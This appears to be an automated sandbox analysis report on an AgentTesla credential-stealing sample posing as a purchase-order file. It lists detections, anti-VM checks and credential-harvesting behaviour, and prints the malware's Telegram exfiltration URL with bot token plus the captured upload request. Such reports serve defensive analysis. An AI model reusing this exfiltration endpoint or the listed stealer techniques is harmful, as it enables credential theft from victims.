
Windows Analysis Report
PO-inv-CQV20(92315).exe

Overview

General Information

Sample name:PO-inv-CQV20(92315).exe
Analysis ID:1431985
MD5:4e62c4b92779d99998cd908a0966bf7d
SHA1:e02dc74baae821c91f12c890db595f9b08db418c
SHA256:3c54f1e2d58d392a6bcd2e6c836d1479888e3c334b8e6f5511a65bc1506681fb
Tags:AgentTeslaexe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO-inv-CQV20(92315).exe (PID: 5040 cmdline: "C:\Users\user\Desktop\PO-inv-CQV20(92315).exe" MD5: 4E62C4B92779D99998CD908A0966BF7D)
    • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jsc.exe (PID: 5868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • jsc.exe (PID: 6412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • WerFault.exe (PID: 5024 cmdline: C:\Windows\system32\WerFault.exe -u -p 5040 -s 1080 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendMessage?chat_id=1469090678"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings (5 of 15 entries shown)
00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.3307185247.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Source | Rule | Description | Author | Strings (5 of 15 entries shown)
3.2.jsc.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
3.2.jsc.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
3.2.jsc.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
3.2.jsc.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x332ea:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3335c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x333e6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33478:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x334e2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33554:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x335ea:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3367a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
No Sigma rule has matched

Timestamp:04/26/24-07:39:59.187251
SID:2851779
Source Port:49699
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected


                      AV Detection

Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendMessage?chat_id=1469090678"}
Source: jsc.exe.5868.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendMessage"}
Source: PO-inv-CQV20(92315).exe | ReversingLabs: Detection: 25%
Source: PO-inv-CQV20(92315).exe | Virustotal: Detection: 22%

                      Exploits

Source: Yara match | File source: 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: PO-inv-CQV20(92315).exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Microsoft.VisualBasic.ni.pdb | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdb | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: System.pdb | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb | source: WERD8AB.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.pdb | source: WERD8AB.tmp.dmp.7.dr

                      Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49699 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: POST /bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc65c412473d6c | Host: api.telegram.org | Content-Length: 924 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc65c412473d6c | Host: api.telegram.org | Content-Length: 924 | Expect: 100-continue | Connection: Keep-Alive
Source: jsc.exe, 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: jsc.exe, 00000003.00000002.3307185247.0000000002AE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: jsc.exe, 00000003.00000002.3307185247.0000000002AE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/
Source: jsc.exe, 00000003.00000002.3307185247.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, cPKWk.cs | .Net Code: _6nIssCpGn
Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, cPKWk.cs | .Net Code: _6nIssCpGn

                      System Summary

Source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5040 -s 1080
Source: PO-inv-CQV20(92315).exe | Static PE information: No import functions for PE file found
Source: PO-inv-CQV20(92315).exe, 00000000.00000000.2065470617.0000023344F62000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameIpatananepa> vs PO-inv-CQV20(92315).exe
Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamea92d6c53-8566-4702-b054-93db855986ee.exe4 vs PO-inv-CQV20(92315).exe
Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameItewiyozimiqF vs PO-inv-CQV20(92315).exe
Source: PO-inv-CQV20(92315).exe | Binary or memory string: OriginalFilenameIpatananepa> vs PO-inv-CQV20(92315).exe
Source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: PO-inv-CQV20(92315).exe, -----.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, cPs8D.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 72CF8egH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, G5CXsdn.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 3uPsILA6U.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 6oQOw74dfIt.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, aMIWm.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@7/5@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5040
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ff095067-8d2e-40a2-96fb-8d89a2341dc8
Source: PO-inv-CQV20(92315).exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PO-inv-CQV20(92315).exe | Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PO-inv-CQV20(92315).exe | ReversingLabs: Detection: 25%
Source: PO-inv-CQV20(92315).exe | Virustotal: Detection: 22%
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | File read: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe
Source: unknown | Process created: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe "C:\Users\user\Desktop\PO-inv-CQV20(92315).exe"
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5040 -s 1080
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: PO-inv-CQV20(92315).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO-inv-CQV20(92315).exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: PO-inv-CQV20(92315).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: PO-inv-CQV20(92315).exe; Static PE information: 0xB06BE3BE [Wed Oct 17 15:31:10 2063 UTC]
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Code function: 0_2_00007FFD348A53DB push es; iretd 0_2_00007FFD348A53DD
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Code function: 0_2_00007FFD3497026B push esp; retf 4810h 0_2_00007FFD34970312
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; Code function: 3_2_05F0D838 push 3405EFB0h; ret 3_2_05F0D90D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; Code function: 3_2_05F036D7 push ebx; iretd 3_2_05F036DA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; Code function: 3_2_05F0D940 push 3405EFB0h; ret 3_2_05F0D90D

                      Hooking and other Techniques for Hiding and Protection

                      Source: initial sample; Icon embedded in binary file: icon matches a legit application icon: download (51).png
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match; File source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Memory allocated: 233452F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Memory allocated: 2335EC90000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; Memory allocated: F60000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; Memory allocated: 2A90000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; Memory allocated: 28E0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe; Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware
                      Source: Amcache.hve.7.dr; Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.7.dr; Binary or memory string: vmci.syshbin
